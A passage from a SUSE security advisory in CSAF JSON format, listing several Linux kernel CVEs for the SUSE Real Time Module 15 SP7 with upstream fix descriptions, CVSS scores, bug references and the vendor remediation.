"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68802",
"url": "https://www.suse.com/security/cve/CVE-2025-68802"
},
{
"category": "external",
"summary": "SUSE Bug 1256661 for CVE-2025-68802",
"url": "https://bugzilla.suse.com/1256661"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "low"
}
],
"title": "CVE-2025-68802"
},
{
"cve": "CVE-2025-68803",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68803"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: NFSv4 file creation neglects setting ACL\n\nAn NFSv4 client that sets an ACL with a named principal during file\ncreation retrieves the ACL afterwards, and finds that it is only a\ndefault ACL (based on the mode bits) and not the ACL that was\nrequested during file creation. This violates RFC 8881 section\n6.4.1.3: \"the ACL attribute is set as given\".\n\nThe issue occurs in nfsd_create_setattr(), which calls\nnfsd_attrs_valid() to determine whether to call nfsd_setattr().\nHowever, nfsd_attrs_valid() checks only for iattr changes and\nsecurity labels, but not POSIX ACLs. When only an ACL is present,\nthe function returns false, nfsd_setattr() is skipped, and the\nPOSIX ACL is never applied to the inode.\n\nSubsequently, when the client retrieves the ACL, the server finds\nno POSIX ACL on the inode and returns one generated from the file\u0027s\nmode bits rather than returning the originally-specified ACL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68803",
"url": "https://www.suse.com/security/cve/CVE-2025-68803"
},
{
"category": "external",
"summary": "SUSE Bug 1256770 for CVE-2025-68803",
"url": "https://bugzilla.suse.com/1256770"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68803"
},
{
"cve": "CVE-2025-68804",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68804"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver\n\nAfter unbinding the driver, another kthread `cros_ec_console_log_work`\nis still accessing the device, resulting an UAF and crash.\n\nThe driver doesn\u0027t unregister the EC device in .remove() which should\nshutdown sub-devices synchronously. Fix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68804",
"url": "https://www.suse.com/security/cve/CVE-2025-68804"
},
{
"category": "external",
"summary": "SUSE Bug 1256617 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "external",
"summary": "SUSE Bug 1256618 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256618"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "important"
}
],
"title": "CVE-2025-68804"
},
{
"cve": "CVE-2025-68808",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68808"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: vidtv: initialize local pointers upon transfer of memory ownership\n\nvidtv_channel_si_init() creates a temporary list (program, service, event)\nand ownership of the memory itself is transferred to the PAT/SDT/EIT\ntables through vidtv_psi_pat_program_assign(),\nvidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign().\n\nThe problem here is that the local pointer where the memory ownership\ntransfer was completed is not initialized to NULL. This causes the\nvidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and\nin the flow that jumps to free_eit, the memory that was freed by\nvidtv_psi_*_table_destroy() can be accessed again by\nvidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it\nis freed once again.\n\nTherefore, to prevent use-after-free and double-free vulnerability,\nlocal pointers must be initialized to NULL when transferring memory\nownership.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68808",
"url": "https://www.suse.com/security/cve/CVE-2025-68808"
},
{
"category": "external",
"summary": "SUSE Bug 1256682 for CVE-2025-68808",
"url": "https://bugzilla.suse.com/1256682"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68808"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-68814",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68814"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: fix filename leak in __io_openat_prep()\n\n __io_openat_prep() allocates a struct filename using getname(). However,\nfor the condition of the file being installed in the fixed file table as\nwell as having O_CLOEXEC flag set, the function returns early. At that\npoint, the request doesn\u0027t have REQ_F_NEED_CLEANUP flag set. Due to this,\nthe memory for the newly allocated struct filename is not cleaned up,\ncausing a memory leak.\n\nFix this by setting the REQ_F_NEED_CLEANUP for the request just after the\nsuccessful getname() call, so that when the request is torn down, the\nfilename will be cleaned up, along with other resources needing cleanup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68814",
"url": "https://www.suse.com/security/cve/CVE-2025-68814"
},
{
"category": "external",
"summary": "SUSE Bug 1256651 for CVE-2025-68814",
"url": "https://bugzilla.suse.com/1256651"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68814"
},
{
"cve": "CVE-2025-68815",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68815"
}
],
"notes": [
{
"category": "general",
